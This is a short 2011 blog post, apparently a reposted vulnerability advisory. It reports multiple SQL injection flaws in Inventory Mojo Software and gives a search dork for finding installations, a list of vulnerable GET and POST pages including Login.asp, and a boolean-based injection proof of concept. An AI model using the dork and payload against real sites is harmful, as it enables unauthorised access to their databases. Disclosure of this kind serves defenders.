Inventory Mojo Software Vulnerable to Multiple SQL Injections ~ Random stuff by yappare

Wednesday, March 23, 2011

Inventory Mojo Software Vulnerable to Multiple SQL Injections

on March 23, 2011 No comments

Title : Inventory Mojo Software Vulnerable to Multiple SQL Injections
Found by : p0pc0rn
Dork : intext:"Powered by Inventory Mojo Software."

SQL
---
Vulnerable Parameters are

Method = GET
------------
categoria.asp
producto.asp
srubro.asp
marca.asp

Method = POST
-------------
buscar.asp
Login.asp
NewUser.asp
do_addToNewsletter.asp

POC
---
http://site.com/categoria.asp?CT=6' and '1'='1 TRUE
http://site.com/categoria.asp?CT=6' and '1'='0 FALSE

thanks,
-p0pc0rn-

Random stuff by yappare

Wednesday, March 23, 2011

Inventory Mojo Software Vulnerable to Multiple SQL Injections

0 comments:

Text Widget

Popular Posts

Pages

Blog Archive

Recent Posts

Unordered List

Categories